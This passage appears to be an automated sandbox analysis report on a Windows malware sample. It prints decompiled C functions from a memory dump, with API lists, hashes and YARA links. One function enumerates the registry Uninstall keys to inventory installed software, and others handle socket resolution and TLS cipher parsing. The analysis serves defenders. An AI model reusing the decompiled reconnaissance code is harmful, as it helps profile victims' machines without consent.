                                                                                                0x0043fe78
                                                                                                0x0043fe81
                                                                                                0x0043fe8a
                                                                                                0x0043fe90
                                                                                                0x0043fe90
                                                                                                0x0043fe93
                                                                                                0x0043fe95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fe97
                                                                                                0x0043fe9d
                                                                                                0x0043fe9e
                                                                                                0x0043fea9
                                                                                                0x0043feb1
                                                                                                0x0043feb9
                                                                                                0x0043febc
                                                                                                0x0043febf
                                                                                                0x0043fec5
                                                                                                0x0043fecb
                                                                                                0x0043fed1
                                                                                                0x0043fed7
                                                                                                0x0043feda
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fedc
                                                                                                0x0043ff01
                                                                                                0x0043ff01
                                                                                                0x0043ff04
                                                                                                0x0043ff08
                                                                                                0x0043ff21
                                                                                                0x0043ff26
                                                                                                0x0043ff29
                                                                                                0x0043ff2b
                                                                                                0x0043ff31
                                                                                                0x0043ff6c
                                                                                                0x0043ff33
                                                                                                0x0043ff33
                                                                                                0x0043ff38
                                                                                                0x0043ff40
                                                                                                0x0043ff41
                                                                                                0x0043ff41
                                                                                                0x0043ff58
                                                                                                0x0043ff5f
                                                                                                0x0043ff62
                                                                                                0x0043ff67
                                                                                                0x0043ff67
                                                                                                0x0043ff6f
                                                                                                0x0043ff72
                                                                                                0x0043ff72
                                                                                                0x0043ff77
                                                                                                0x00000000
                                                                                                0x0043ff77
                                                                                                0x0043fede
                                                                                                0x0043fee0
                                                                                                0x0043fee5
                                                                                                0x0043feeb
                                                                                                0x0043fef4
                                                                                                0x0043fefd
                                                                                                0x0043fefd
                                                                                                0x00000000
                                                                                                0x0043fee0
                                                                                                0x0043ff9a
                                                                                                0x0043ff9a
                                                                                                0x0043ff9e
                                                                                                0x0043ffa6
                                                                                                0x0043ffac
                                                                                                0x0043ffaf
                                                                                                0x0043ffb5
                                                                                                0x0043ffb7
                                                                                                0x0043fff7
                                                                                                0x0043fffd
                                                                                                0x00440004
                                                                                                0x00440004
                                                                                                0x0044000a
                                                                                                0x0044000e
                                                                                                0x00000000
                                                                                                0x00440010
                                                                                                0x00440010
                                                                                                0x00440014
                                                                                                0x00440019
                                                                                                0x0044001d
                                                                                                0x00440022
                                                                                                0x00440029
                                                                                                0x00440037
                                                                                                0x0044003d
                                                                                                0x00440040
                                                                                                0x00440040
                                                                                                0x0044000e
                                                                                                0x0044004f
                                                                                                0x00440057
                                                                                                0x00440060
                                                                                                0x0043ffb9
                                                                                                0x0043ffbf
                                                                                                0x0043ffc2
                                                                                                0x0043ffc9
                                                                                                0x0043ffdb
                                                                                                0x0043ffe2
                                                                                                0x0043ffef
                                                                                                0x00000000
                                                                                                0x0043ffef
                                                                                                0x00000000
                                                                                                0x0043ffb7
                                                                                                0x0043fe10
                                                                                                0x0043fd8b
                                                                                                0x00000000
                                                                                                0x0043fd8b
                                                                                                0x00000000
                                                                                                0x0043fd89
                                                                                                0x0043fd82
                                                                                                0x0043fd84
                                                                                                0x0043fd84
                                                                                                0x00000000
                                                                                                0x0043fd0e
                                                                                                0x0043fd0e
                                                                                                0x0043fd10
                                                                                                0x0043fd20
                                                                                                0x0043fd20
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00442F68: GetLastError.KERNEL32(?,0043CA3A,004362A5,0043CA3A,0046E268,?,0043A7BA,FF8BC35D,0046E268,0046E268), ref: 00442F6C
                                                                                                  • Part of subcall function 00442F68: _free.LIBCMT ref: 00442F9F
                                                                                                  • Part of subcall function 00442F68: SetLastError.KERNEL32(00000000,FF8BC35D,0046E268,0046E268), ref: 00442FE0
                                                                                                  • Part of subcall function 00442F68: _abort.LIBCMT ref: 00442FE6
                                                                                                • _memcmp.LIBVCRUNTIME ref: 0043FF58
                                                                                                • _free.LIBCMT ref: 0043FFC9
                                                                                                • _free.LIBCMT ref: 0043FFE2
                                                                                                • _free.LIBCMT ref: 00440014
                                                                                                • _free.LIBCMT ref: 0044001D
                                                                                                • _free.LIBCMT ref: 00440029
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 62246fbe2c6a4c795d1ad10a4e17c169d4a3493bfb010bf9b70b3d91c1d88982
                                                                                                • Instruction ID: 63a341f8b14465f0ea28c45dbb27bf6383284dc198ec993310377ceb7ae64faa
                                                                                                • Opcode Fuzzy Hash: 62246fbe2c6a4c795d1ad10a4e17c169d4a3493bfb010bf9b70b3d91c1d88982
                                                                                                • Instruction Fuzzy Hash: 51B14975E0121A9FDB24DF19C889AAEB7B4FF08304F5045AEE90AA7350D734AE94CF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00411CE2, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 43%
                                                                                                			E00411CE2(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed int _v24;
				signed short _v28;
				signed short _v32;
				char _v36;
				signed int _t76;
				signed int _t78;
				signed short _t87;
				signed int _t88;
				signed short _t91;
				signed short _t92;
				void* _t94;
				signed int _t103;
				signed char _t105;
				void* _t106;
				signed int _t113;
				signed short _t114;
				signed int _t116;
				signed int _t122;
				signed int* _t124;
				signed int _t125;

				_t116 = _a8;
				_t105 = 0;
				_t103 = 0;
				_v12 = 0;
				_t125 = 0;
				_v24 = 0;
				_t124 = _a16;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v16 = 0;
				_v32 = 0;
				_v20 = 0;
				 *_t124 = 0;
				if(_a4 != 0 || _t116 != 0) {
					_t76 = _a12;
					__eflags = _t76;
					if(_t76 == 0) {
						L20:
						_a16 = _t103;
						__eflags = _t116;
						if(_t116 == 0) {
							L40:
							__eflags = _a4 - _t125;
							if(_a4 == _t125) {
								__eflags = _v12 & 0x00000001;
								_t106 = 0;
								_t78 =  !=  ? _t106 : 0x7f000001;
								__imp__#8(0x7f000001);
								L47:
								_a8 = _t78;
								_t79 = E00411A2B(_t103, _v24, __eflags, _v8, _t78);
								 *_t124 = _t79;
								__eflags = _t79;
								if(_t79 != 0) {
									__eflags = _a4 - _t125;
									if(_a4 == _t125) {
										L54:
										__eflags = _v16;
										if(_v16 == 0) {
											L57:
											return _t125;
										}
										_t125 = E00411C66(_v20,  *_t124);
										__eflags = _t125;
										if(_t125 == 0) {
											goto L57;
										}
										L56:
										E00411CA4(_t79,  *_t124);
										 *_t124 =  *_t124 & 0x00000000;
										__eflags =  *_t124;
										goto L57;
									}
									 *_t79 =  *_t79 | 0x00000004;
									__eflags = _v12 & 0x00000002;
									if((_v12 & 0x00000002) == 0) {
										goto L54;
									}
									__imp__#12(_a8);
									 *((intOrPtr*)( *_t124 + 0x14)) = E004119A0(_t79);
									_t79 =  *_t124;
									__eflags =  *((intOrPtr*)(_t79 + 0x14)) - _t125;
									if( *((intOrPtr*)(_t79 + 0x14)) != _t125) {
										goto L54;
									}
									_t125 = 8;
									L53:
									__eflags = _t125;
									if(_t125 != 0) {
										goto L56;
									}
									goto L54;
								}
								_t125 = 8;
								goto L56;
							}
							__eflags = E004119DD(_a4,  &_v36);
							if(__eflags != 0) {
								_t78 = _v36;
								goto L47;
							}
							_t79 = _v12;
							__eflags = _t79 & 0x00000004;
							if((_t79 & 0x00000004) == 0) {
								_t125 = _t79;
								goto L53;
							}
							_t125 = 0x2af9;
							goto L56;
						}
						_t113 = E00437B68(_t105, _t116,  &_v28, 0xa) & 0x0000ffff;
						_t87 = _v28;
						_v8 = _t113;
						__eflags =  *_t87;
						if( *_t87 != 0) {
							__eflags = _t103;
							if(_t103 == 0) {
								L26:
								__imp__#55(_a8, "udp");
								__eflags = _t87;
								if(_t87 != 0) {
									_t91 =  *(_t87 + 8) & 0x0000ffff;
									_v20 = _t91;
									_t87 = _t91 & 0x0000ffff;
									_v8 = _t87;
								}
								L28:
								__eflags = _t103;
								if(_t103 == 0) {
									L30:
									__imp__#55(_a8, "tcp");
									_t122 = 1;
									__eflags = _t87;
									if(_t87 == 0) {
										L32:
										_t114 = _v32;
										_t88 = _v8;
										L33:
										__eflags = _t88;
										if(_t88 != 0) {
											__eflags = _t103;
											if(_t103 != 0) {
												goto L40;
											}
											__eflags = _t114;
											_t103 = (_t103 & 0xffffff00 | _t114 == 0x00000000) + 1;
											__eflags = _t114;
											if(_t114 == 0) {
												L39:
												_t49 =  &_v16;
												 *_t49 = _v16 & _t125;
												__eflags =  *_t49;
												goto L40;
											}
											__eflags = _v20 - _t125;
											if(_v20 == _t125) {
												goto L39;
											}
											_v16 = _t122;
											goto L40;
										}
										__eflags = _t103;
										_t90 =  !=  ? 0x277d : 0x2af9;
										return  !=  ? 0x277d : 0x2af9;
									}
									_t114 =  *(_t87 + 8) & 0x0000ffff;
									_t88 = _t114 & 0x0000ffff;
									_v8 = _t88;
									goto L33;
								}
								_t122 = 1;
								__eflags = _t103 - 1;
								if(_t103 != 1) {
									goto L32;
								}
								goto L30;
							}
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L28;
							}
							goto L26;
						}
						__imp__#9(_t113);
						_t92 = _t87 & 0x0000ffff;
						__eflags = _t103;
						_v20 = _t92;
						_v8 = _t92 & 0x0000ffff;
						_t94 = 1;
						_t103 =  ==  ? _t94 : _t103;
						__eflags = _a16;
						_v16 = 0 | _a16 == 0x00000000;
						goto L40;
					}
					__eflags =  *((intOrPtr*)(_t76 + 0x10)) - _t105;
					if( *((intOrPtr*)(_t76 + 0x10)) != _t105) {
						L23:
						return 0x2afb;
					}
					__eflags =  *((intOrPtr*)(_t76 + 0x14)) - _t105;
					if( *((intOrPtr*)(_t76 + 0x14)) != _t105) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t76 + 0x18)) - _t105;
					if( *((intOrPtr*)(_t76 + 0x18)) != _t105) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t76 + 0x1c)) - _t105;
					if( *((intOrPtr*)(_t76 + 0x1c)) != _t105) {
						goto L23;
					}
					_t105 =  *_t76;
					_v12 = _t105;
					__eflags = _t105 & 0x00000002;
					if((_t105 & 0x00000002) == 0) {
						L11:
						__eflags =  *((intOrPtr*)(_t76 + 4)) - _t103;
						if( *((intOrPtr*)(_t76 + 4)) == _t103) {
							L14:
							_t103 =  *(_t76 + 8);
							__eflags = _t103;
							if(_t103 == 0) {
								L19:
								_v24 =  *((intOrPtr*)(_t76 + 0xc));
								goto L20;
							}
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								goto L19;
							}
							__eflags = _t103 - 2;
							if(_t103 == 2) {
								goto L19;
							}
							__eflags = _t103 - 3;
							if(_t103 == 3) {
								goto L19;
							}
							return 0x273c;
						}
						__eflags =  *((intOrPtr*)(_t76 + 4)) - 2;
						if( *((intOrPtr*)(_t76 + 4)) == 2) {
							goto L14;
						}
						return 0x273f;
					}
					__eflags = _a4 - _t103;
					if(_a4 != _t103) {
						goto L11;
					}
					return 0x2726;
				} else {
					return 0x2af9;
				}
			}



























                                                                                                0x00411ce8
                                                                                                0x00411ceb
                                                                                                0x00411cee
                                                                                                0x00411cf0
                                                                                                0x00411cf4
                                                                                                0x00411cf6
                                                                                                0x00411cfa
                                                                                                0x00411cfd
                                                                                                0x00411d00
                                                                                                0x00411d03
                                                                                                0x00411d06
                                                                                                0x00411d09
                                                                                                0x00411d0c
                                                                                                0x00411d0f
                                                                                                0x00411d14
                                                                                                0x00411d24
                                                                                                0x00411d27
                                                                                                0x00411d29
                                                                                                0x00411da3
                                                                                                0x00411da3
                                                                                                0x00411da6
                                                                                                0x00411da8
                                                                                                0x00411e91
                                                                                                0x00411e91
                                                                                                0x00411e94
                                                                                                0x00411ed4
                                                                                                0x00411edf
                                                                                                0x00411ee0
                                                                                                0x00411ee4
                                                                                                0x00411eea
                                                                                                0x00411ef3
                                                                                                0x00411ef6
                                                                                                0x00411efb
                                                                                                0x00411efd
                                                                                                0x00411eff
                                                                                                0x00411f06
                                                                                                0x00411f09
                                                                                                0x00411f37
                                                                                                0x00411f37
                                                                                                0x00411f3b
                                                                                                0x00411f57
                                                                                                0x00000000
                                                                                                0x00411f57
                                                                                                0x00411f47
                                                                                                0x00411f49
                                                                                                0x00411f4b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411f4d
                                                                                                0x00411f4f
                                                                                                0x00411f54
                                                                                                0x00411f54
                                                                                                0x00000000
                                                                                                0x00411f54
                                                                                                0x00411f0b
                                                                                                0x00411f0e
                                                                                                0x00411f12
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411f17
                                                                                                0x00411f26
                                                                                                0x00411f29
                                                                                                0x00411f2b
                                                                                                0x00411f2e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411f32
                                                                                                0x00411f33
                                                                                                0x00411f33
                                                                                                0x00411f35
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411f35
                                                                                                0x00411f03
                                                                                                0x00000000
                                                                                                0x00411f03
                                                                                                0x00411ea1
                                                                                                0x00411ea3
                                                                                                0x00411ecf
                                                                                                0x00000000
                                                                                                0x00411ecf
                                                                                                0x00411ea5
                                                                                                0x00411ea8
                                                                                                0x00411eaa
                                                                                                0x00411ecb
                                                                                                0x00000000
                                                                                                0x00411ecb
                                                                                                0x00411eac
                                                                                                0x00000000
                                                                                                0x00411eac
                                                                                                0x00411dba
                                                                                                0x00411dc0
                                                                                                0x00411dc3
                                                                                                0x00411dc6
                                                                                                0x00411dc9
                                                                                                0x00411e00
                                                                                                0x00411e02
                                                                                                0x00411e09
                                                                                                0x00411e11
                                                                                                0x00411e17
                                                                                                0x00411e19
                                                                                                0x00411e1b
                                                                                                0x00411e1f
                                                                                                0x00411e22
                                                                                                0x00411e25
                                                                                                0x00411e25
                                                                                                0x00411e28
                                                                                                0x00411e28
                                                                                                0x00411e2a
                                                                                                0x00411e33
                                                                                                0x00411e3b
                                                                                                0x00411e43
                                                                                                0x00411e44
                                                                                                0x00411e46
                                                                                                0x00411e54
                                                                                                0x00411e54
                                                                                                0x00411e57
                                                                                                0x00411e5a
                                                                                                0x00411e5a
                                                                                                0x00411e5d
                                                                                                0x00411e73
                                                                                                0x00411e75
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e77
                                                                                                0x00411e7d
                                                                                                0x00411e7e
                                                                                                0x00411e81
                                                                                                0x00411e8e
                                                                                                0x00411e8e
                                                                                                0x00411e8e
                                                                                                0x00411e8e
                                                                                                0x00000000
                                                                                                0x00411e8e
                                                                                                0x00411e83
                                                                                                0x00411e87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e89
                                                                                                0x00000000
                                                                                                0x00411e89
                                                                                                0x00411e5f
                                                                                                0x00411e6b
                                                                                                0x00000000
                                                                                                0x00411e6b
                                                                                                0x00411e48
                                                                                                0x00411e4c
                                                                                                0x00411e4f
                                                                                                0x00000000
                                                                                                0x00411e4f
                                                                                                0x00411e2e
                                                                                                0x00411e2f
                                                                                                0x00411e31
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e31
                                                                                                0x00411e04
                                                                                                0x00411e07
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411e07
                                                                                                0x00411dcc
                                                                                                0x00411dd2
                                                                                                0x00411dd5
                                                                                                0x00411dd7
                                                                                                0x00411ddd
                                                                                                0x00411de2
                                                                                                0x00411de3
                                                                                                0x00411de8
                                                                                                0x00411dee
                                                                                                0x00000000
                                                                                                0x00411dee
                                                                                                0x00411d2b
                                                                                                0x00411d2e
                                                                                                0x00411df6
                                                                                                0x00000000
                                                                                                0x00411df6
                                                                                                0x00411d34
                                                                                                0x00411d37
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d3d
                                                                                                0x00411d40
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d46
                                                                                                0x00411d49
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d4f
                                                                                                0x00411d51
                                                                                                0x00411d54
                                                                                                0x00411d57
                                                                                                0x00411d68
                                                                                                0x00411d68
                                                                                                0x00411d6b
                                                                                                0x00411d7d
                                                                                                0x00411d7d
                                                                                                0x00411d80
                                                                                                0x00411d82
                                                                                                0x00411d9d
                                                                                                0x00411da0
                                                                                                0x00000000
                                                                                                0x00411da0
                                                                                                0x00411d84
                                                                                                0x00411d87
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d89
                                                                                                0x00411d8c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d8e
                                                                                                0x00411d91
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d93
                                                                                                0x00411d6d
                                                                                                0x00411d71
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d73
                                                                                                0x00411d59
                                                                                                0x00411d5c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00411d1a
                                                                                                0x00000000
                                                                                                0x00411d1a

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: tcp$udp
                                                                                                • API String ID: 0-3725065008
                                                                                                • Opcode ID: e9e86f7bf4b6a832bbec402232646f3a132405df114319c8f84da0ea571296c6
                                                                                                • Instruction ID: 82daf4815be514220aeae679c2df1eb09617d7ec83e3698150b49ddb65605222
                                                                                                • Opcode Fuzzy Hash: e9e86f7bf4b6a832bbec402232646f3a132405df114319c8f84da0ea571296c6
                                                                                                • Instruction Fuzzy Hash: 95818A70A0030ADBDF248F95D5846FEB7B5AF44345F14806BEA05AB360E738DE81DB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004185F5, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E004185F5(void* __ebx, void* __ecx) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v1500;
				void* __edi;
				long _t72;
				long _t78;
				long _t206;
				void* _t207;
				intOrPtr* _t208;

				_t129 = __ebx;
				_t207 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v12) == 0) {
					_v16 = 0x400;
					_t206 = 0;
					E00401F5F(__ebx,  &_v64);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v1500);
					_push(0);
					while(1) {
						_t72 = RegEnumKeyExA(_v12, ??, ??, ??, ??, ??, ??, ??);
						__eflags = _t72 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t72;
						if(_t72 != 0) {
							L8:
							_t206 = _t206 + 1;
							__eflags = _t206;
							_v16 = 0x400;
						} else {
							_t78 = RegOpenKeyExA(_v12,  &_v1500, 0, 0x20019,  &_v8);
							__eflags = _t78;
							if(_t78 == 0) {
								E004109EE( &_v40, _v8, L"DisplayName");
								 *_t208 = L"Publisher";
								E004109EE( &_v184, _v8);
								 *_t208 = L"DisplayVersion";
								E004109EE( &_v160, _v8);
								 *_t208 = L"InstallLocation";
								E004109EE( &_v136, _v8);
								 *_t208 = L"InstallDate";
								E004109EE( &_v112, _v8);
								 *_t208 = L"UninstallString";
								E004109EE( &_v88, _v8);
								__eflags = E00409DEA();
								if(__eflags == 0) {
									E00403303(E00403098(_t129,  &_v208, E00403098(_t129,  &_v232, E0040440A(_t129,  &_v256, E00403098(_t129,  &_v280, E0040440A(_t129,  &_v304, E00403098(_t129,  &_v328, E0040440A(_t129,  &_v352, E00403098(_t129,  &_v376, E0040440A(_t129,  &_v400, E00403098(_t129,  &_v424, E0040440A(_t129,  &_v448, E00407677( &_v472,  &_v40, __eflags, 0x466afc), __eflags,  &_v160), _t206, __eflags, 0x466afc), __eflags,  &_v112), _t206, __eflags, 0x466afc), __eflags,  &_v184), _t206, __eflags, 0x466afc), __eflags,  &_v136), _t206, __eflags, 0x466afc), __eflags,  &_v88), _t206, __eflags, 0x466afc), _t206, __eflags, "\n"));
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
									E00401EE2();
								}
								RegCloseKey(_v8);
								E00401EE2();
								E00401EE2();
								E00401EE2();
								E00401EE2();
								E00401EE2();
								E00401EE2();
								goto L8;
							}
						}
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v16);
						_push( &_v1500);
						_push(_t206);
					}
					RegCloseKey(_v12);
					E0040330C(_t129, _t207, __eflags,  &_v64);
					E00401EE2();
				} else {
					E00404260(__ebx, _t207, 0x46079c);
				}
				return _t207;
			}
































                                                                                                0x004185f5
                                                                                                0x00418615
                                                                                                0x0041861f
                                                                                                0x00418635
                                                                                                0x0041863c
                                                                                                0x0041863e
                                                                                                0x00418648
                                                                                                0x00418649
                                                                                                0x0041864a
                                                                                                0x0041864b
                                                                                                0x0041864c
                                                                                                0x00418653
                                                                                                0x00418654
                                                                                                0x004188c8
                                                                                                0x004188cb
                                                                                                0x004188d1
                                                                                                0x004188d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041865a
                                                                                                0x0041865c
                                                                                                0x004188ae
                                                                                                0x004188ae
                                                                                                0x004188ae
                                                                                                0x004188af
                                                                                                0x00418662
                                                                                                0x00418677
                                                                                                0x0041867d
                                                                                                0x0041867f
                                                                                                0x00418690
                                                                                                0x0041869e
                                                                                                0x004186a5
                                                                                                0x004186b3
                                                                                                0x004186ba
                                                                                                0x004186c8
                                                                                                0x004186cf
                                                                                                0x004186da
                                                                                                0x004186e1
                                                                                                0x004186ec
                                                                                                0x004186f3
                                                                                                0x00418701
                                                                                                0x00418703
                                                                                                0x004187e3
                                                                                                0x004187ee
                                                                                                0x004187f9
                                                                                                0x00418804
                                                                                                0x0041880f
                                                                                                0x0041881a
                                                                                                0x00418825
                                                                                                0x00418830
                                                                                                0x0041883b
                                                                                                0x00418846
                                                                                                0x00418851
                                                                                                0x0041885c
                                                                                                0x00418867
                                                                                                0x00418867
                                                                                                0x0041886f
                                                                                                0x00418878
                                                                                                0x00418880
                                                                                                0x0041888b
                                                                                                0x00418896
                                                                                                0x004188a1
                                                                                                0x004188a9
                                                                                                0x00000000
                                                                                                0x004188a9
                                                                                                0x0041867f
                                                                                                0x004188b6
                                                                                                0x004188b8
                                                                                                0x004188b9
                                                                                                0x004188ba
                                                                                                0x004188bb
                                                                                                0x004188bf
                                                                                                0x004188c6
                                                                                                0x004188c7
                                                                                                0x004188c7
                                                                                                0x004188df
                                                                                                0x004188eb
                                                                                                0x004188f3
                                                                                                0x00418621
                                                                                                0x00418628
                                                                                                0x00418628
                                                                                                0x004188ff

                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00418617
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 004188CB
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004188DF
                                                                                                Strings
                                                                                                • DisplayName, xrefs: 0041868B
                                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041860B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnumOpen
                                                                                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                • API String ID: 1332880857-3614651759
                                                                                                • Opcode ID: 004402a4a4c8776d7f5f40b03e4d90bfbe69429db1f8d137450362dc32d5c42a
                                                                                                • Instruction ID: 7a4ec65f64056a329eab026135af6b95974d318ca08f112ca2e0105190b16006
                                                                                                • Opcode Fuzzy Hash: 004402a4a4c8776d7f5f40b03e4d90bfbe69429db1f8d137450362dc32d5c42a
                                                                                                • Instruction Fuzzy Hash: 04811F719001199BDB14EF61DD92AEEB3B8EF50308F2041AFE50AB6191EF745F89CE58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041C7EA, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 174COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E0041C7EA(short* __edx) {
				signed int _v8;
				intOrPtr _v12;
				short* _v16;
				short _v20;
				char _v24;
				intOrPtr _v28;
				char _v80;
				void* _t45;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr _t65;
				void* _t67;
				char _t68;
				char _t69;
				char* _t70;
				signed int _t71;
				short* _t72;
				signed int _t76;
				char* _t79;
				char* _t81;
				intOrPtr _t82;
				char* _t85;
				void* _t86;
				void* _t89;
				intOrPtr _t91;
				char* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_v16 = __edx;
				_v8 = _v8 & 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = E0040BADD();
				_t85 = "TLS_AES_128_GCM_SHA256";
				if(__edx == 0) {
					L37:
					return 0;
				}
				_t45 = E00437780(_t85, "ALL", 3);
				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = E00437780(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E00432660(_t85, 0x4668dc);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E0043CFB0( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x4618d0;
								while(1) {
									_t15 = _t93 - 4; // 0x466e70
									_t59 = E00437780( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = E00437780( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x4618d4));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x4618d5));
								_t62 =  *((intOrPtr*)(_t76 + 0x4618d4));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E00432660( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x4618d5));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
